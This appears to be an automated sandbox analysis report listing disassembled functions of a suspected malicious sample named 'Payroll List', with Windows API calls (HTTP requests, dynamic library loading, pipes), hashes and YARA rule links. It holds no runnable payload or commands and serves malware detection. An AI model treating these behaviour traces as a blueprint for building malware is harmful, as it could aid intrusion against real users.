                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00165075
                                                                    • GetMenuItemInfoW.USER32 ref: 00165091
                                                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 001650D7
                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001E1708,00000000), ref: 00165120
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1173514356-4108050209
                                                                    • Opcode ID: 3cbeb9ec8cd502e4ede938105f26bc45aae7b4fd3b27ee846511a1db8b3f51d0
                                                                    • Instruction ID: be4a79c14eca1a8c41edb385611490c30998d6c5443003ea5d7b8405897fef0c
                                                                    • Opcode Fuzzy Hash: 3cbeb9ec8cd502e4ede938105f26bc45aae7b4fd3b27ee846511a1db8b3f51d0
                                                                    • Instruction Fuzzy Hash: 8E41F3312057019FD720DF24DC80F6ABBE6AF8A324F044A1EF89697391D730E964CB62
                                                                    Function 0016E698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0016E742
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0016E768
                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0016E78D
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0016E7B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID: p1Wu`KXu
                                                                    • API String ID: 3321077145-4063981602
                                                                    • Opcode ID: 9417cf7ffa53ce005d86751e458de6970209dfe903b069f92509a1e992a6eb34
                                                                    • Instruction ID: d8b574aa8003f63500b36f17745805189dfb32b528d364eb1851fc1b801072be
                                                                    • Opcode Fuzzy Hash: 9417cf7ffa53ce005d86751e458de6970209dfe903b069f92509a1e992a6eb34
                                                                    • Instruction Fuzzy Hash: 66415A3A600610DFCF11EF28D445A4DBBE5BF69710F198488E946AB7A2CB30FC51CB95
                                                                    Function 00180567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 00180587
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharLower
                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                    • API String ID: 2358735015-567219261
                                                                    • Opcode ID: 96ed180cc99f5a7205dd23a8769e683bbfb2088e7c718214702147a4edc44703
                                                                    • Instruction ID: edec9d0d970108d48e787a1fabd9825a91df7dd9e3c06930a5192f5674802c31
                                                                    • Opcode Fuzzy Hash: 96ed180cc99f5a7205dd23a8769e683bbfb2088e7c718214702147a4edc44703
                                                                    • Instruction Fuzzy Hash: 1131A47050021AAFCF01EF54DD419EEB3B4FF65314B10862AE826A76D1EB71EA19CF90
                                                                    Function 0015B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0015B88E
                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0015B8A1
                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 0015B8D1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 3850602802-1403004172
                                                                    • Opcode ID: 0db8475df4b93613d8919ec04bc9e03c267be8b1933748cc54952431c64fbea0
                                                                    • Instruction ID: 6f3ccc65019ca3528a91d1980a9c321dd19a41e5ebe52759117bd70c40c6da00
                                                                    • Opcode Fuzzy Hash: 0db8475df4b93613d8919ec04bc9e03c267be8b1933748cc54952431c64fbea0
                                                                    • Instruction Fuzzy Hash: 27210571900108FFDB18AB64E886DFE777CDF66351B114129F936AB1E0EB744D0A9B60
                                                                    Function 001251AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0012522F
                                                                    • _wcscpy.LIBCMT ref: 00125283
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00125293
                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00193CB0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                    • String ID: Line:
                                                                    • API String ID: 1053898822-1585850449
                                                                    • Opcode ID: 78191bf011b71881bea88fc2e019ba15b3facd797c44b08d80ea23cfa93504ac
                                                                    • Instruction ID: b80c44f36620124d257bcc3bafc791f95bff30f2a3a300ac626c33c90ae2b3ec
                                                                    • Opcode Fuzzy Hash: 78191bf011b71881bea88fc2e019ba15b3facd797c44b08d80ea23cfa93504ac
                                                                    • Instruction Fuzzy Hash: 6131EF714087A0AFD325EBA0EC86FEE77D8AB54310F00451EF595864D1EB70A6A8CB92
                                                                    Function 001743E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00174401
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00174427
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00174457
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0017449E
                                                                      • Part of subcall function 00175052: GetLastError.KERNEL32(?,?,001743CC,00000000,00000000,00000001), ref: 00175067
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 1951874230-3916222277
                                                                    • Opcode ID: 31ef47aefa3e38fbdc47e3c4ca01018259be451270b8b158e667067f4b788a1c
                                                                    • Instruction ID: bb64e6927f9c5230cbba870665e82e29570291ba6c6aedbd786667bf2de7df45
                                                                    • Opcode Fuzzy Hash: 31ef47aefa3e38fbdc47e3c4ca01018259be451270b8b158e667067f4b788a1c
                                                                    • Instruction Fuzzy Hash: AF21A9B6640608BFE7119BA49C85EBBBAFCEB49748F11C01AF10AA2140EB748D45A770
                                                                    Function 001890E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013D1BA
                                                                      • Part of subcall function 0013D17C: GetStockObject.GDI32(00000011), ref: 0013D1CE
                                                                      • Part of subcall function 0013D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0013D1D8
                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0018915C
                                                                    • LoadLibraryW.KERNEL32(?), ref: 00189163
                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00189178
                                                                    • DestroyWindow.USER32(?), ref: 00189180
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                    • String ID: SysAnimate32
                                                                    • API String ID: 4146253029-1011021900
                                                                    • Opcode ID: 3b0fe700209d743ed2571bc12bcc5842f60ef1f771b727073d7798599a78391a
                                                                    • Instruction ID: 3078058d52df82001c35d928951035302e9d353c08df9b61f5e6029406473b06
                                                                    • Opcode Fuzzy Hash: 3b0fe700209d743ed2571bc12bcc5842f60ef1f771b727073d7798599a78391a
                                                                    • Instruction Fuzzy Hash: 4D21DE71204206BBEF206F64DC88EBB37ADEFAA374F180218F915A6190C731CD41AB60
                                                                    Function 00169568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00169588
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001695B9
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 001695CB
                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00169605
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandle$FilePipe
                                                                    • String ID: nul
                                                                    • API String ID: 4209266947-2873401336
                                                                    • Opcode ID: e8f38d80df40eb59dbe92ef3042ecc4df4bbc7faa0402ac21c2221d7e6891a8f
                                                                    • Instruction ID: 4543f9a334d159bc00989f46a5dbadeba30211a18278234dcdb5f920549ebb55
                                                                    • Opcode Fuzzy Hash: e8f38d80df40eb59dbe92ef3042ecc4df4bbc7faa0402ac21c2221d7e6891a8f
                                                                    • Instruction Fuzzy Hash: E3216071600305ABDB219F29DC05A9A7BFCAF96720F204A1AFDA2D72D0D770D965CB10
                                                                    Function 00169634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00169653
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00169683
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00169694
                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001696CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandle$FilePipe
                                                                    • String ID: nul
                                                                    • API String ID: 4209266947-2873401336
                                                                    • Opcode ID: f0addf7cd558ee0a5e931f16909c7dc377619d6bdb8903fc96510b2cf4f877c0
                                                                    • Instruction ID: 7349e4165b88972067c72df56ae83e2273421b754fcd7fd0ec977b5f97ff3b5d
                                                                    • Opcode Fuzzy Hash: f0addf7cd558ee0a5e931f16909c7dc377619d6bdb8903fc96510b2cf4f877c0
                                                                    • Instruction Fuzzy Hash: 862180716003159BDB209F69DC44E9A77ECAF55730F200A19FCA1E72D0EB70D8A5CB51
                                                                    Function 0016DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0016DB0A
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0016DB5E
                                                                    • __swprintf.LIBCMT ref: 0016DB77
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,001BDC00), ref: 0016DBB5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                    • String ID: %lu
                                                                    • API String ID: 3164766367-685833217
                                                                    • Opcode ID: c614db011d320cd7c22c497fc44fe0dbf247293800174d6e52af516da1f83d48
                                                                    • Instruction ID: ead98aae421ae4585a7791c7ca4a93d2cdcea0de5ace44f4be7dc2bf492ff1a6
                                                                    • Opcode Fuzzy Hash: c614db011d320cd7c22c497fc44fe0dbf247293800174d6e52af516da1f83d48
                                                                    • Instruction Fuzzy Hash: A7216535A00108AFCB10EFA5DD85DEEBBB8EF59704B104069F505D7251DB71EA45CBA1
                                                                    Function 0015C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0015C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0015C84A
                                                                      • Part of subcall function 0015C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0015C85D
                                                                      • Part of subcall function 0015C82D: GetCurrentThreadId.KERNEL32 ref: 0015C864
                                                                      • Part of subcall function 0015C82D: AttachThreadInput.USER32(00000000), ref: 0015C86B
                                                                    • GetFocus.USER32 ref: 0015CA05
                                                                      • Part of subcall function 0015C876: GetParent.USER32(?), ref: 0015C884
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0015CA4E
                                                                    • EnumChildWindows.USER32(?,0015CAC4), ref: 0015CA76
                                                                    • __swprintf.LIBCMT ref: 0015CA90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                    • String ID: %s%d
                                                                    • API String ID: 3187004680-1110647743
                                                                    • Opcode ID: 7478331fd4d65ecae5f086115c8953c9d4eafd70ec101ccb62bedbe42cdef30c
                                                                    • Instruction ID: 739e1e8bf4c084ab1b51dff214188e60094e0817b1228962b689b59192505cce
                                                                    • Opcode Fuzzy Hash: 7478331fd4d65ecae5f086115c8953c9d4eafd70ec101ccb62bedbe42cdef30c
                                                                    • Instruction Fuzzy Hash: F2117F71600309BFCF11BFA0DC85FE93B69AB55715F008066FE29AB182DB749949DBB0
                                                                    Function 00181945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001819F3
                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00181A26
                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00181B49
                                                                    • CloseHandle.KERNEL32(?), ref: 00181BBF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                    • String ID:
                                                                    • API String ID: 2364364464-0
                                                                    • Opcode ID: f2458eedbf3ae8f77ce264cec65f6ea15d30976d4cb10491cdec638406b9ace5
                                                                    • Instruction ID: 9a4e2808768f2a17c12f29fdec25217e43fb5767341d3685f913a8c608271946
                                                                    • Opcode Fuzzy Hash: f2458eedbf3ae8f77ce264cec65f6ea15d30976d4cb10491cdec638406b9ace5
                                                                    • Instruction Fuzzy Hash: 62815171600214ABDF14AF64C886BADBBF9BF18720F148459F909AF382D7B5A941CF90
                                                                    Function 0018E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0018E1D5
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0018E20D
                                                                    • IsDlgButtonChecked.USER32(?,00000001), ref: 0018E248
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0018E269
                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0018E281
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ButtonCheckedLongWindow
                                                                    • String ID:
                                                                    • API String ID: 3188977179-0
                                                                    • Opcode ID: b25fa93ae3d202a92036a6e344a11ee96b757dd8c6ed4fdb66052a48716ec26a
                                                                    • Instruction ID: d2a0a51b66908fc29839db46dcfdd90e7134d95b17f3d7a7a54f2c770fedd7ac
                                                                    • Opcode Fuzzy Hash: b25fa93ae3d202a92036a6e344a11ee96b757dd8c6ed4fdb66052a48716ec26a
                                                                    • Instruction Fuzzy Hash: DA619E74A04644AFDB24EF58C899FEE77FAAB89300F144459F95A972A1C771AA80CF10
                                                                    Function 00161C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00161CB4
                                                                    • VariantClear.OLEAUT32(00000013), ref: 00161D26
                                                                    • VariantClear.OLEAUT32(00000000), ref: 00161D81
                                                                    • VariantClear.OLEAUT32(?), ref: 00161DF8
                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00161E26
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                    • String ID:
                                                                    • API String ID: 4136290138-0
                                                                    • Opcode ID: a591f342f781305e55d843b96bba8e7907775d5e46e11021244b1933898077eb
                                                                    • Instruction ID: 8bb3305d63d73112c2f44d137c7619e3222ca01be197db793ccb92efc6458be5
                                                                    • Opcode Fuzzy Hash: a591f342f781305e55d843b96bba8e7907775d5e46e11021244b1933898077eb
                                                                    • Instruction Fuzzy Hash: E85148B5A00209EFDB14CF58D884AAAB7B8FF4D314B198559ED59DB301E730EA51CFA0
                                                                    Function 00180688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 001806EE
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0018077D
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0018079B
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 001807E1
                                                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 001807FB
                                                                      • Part of subcall function 0013E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0016A574,?,?,00000000,00000008), ref: 0013E675
                                                                      • Part of subcall function 0013E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0016A574,?,?,00000000,00000008), ref: 0013E699
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
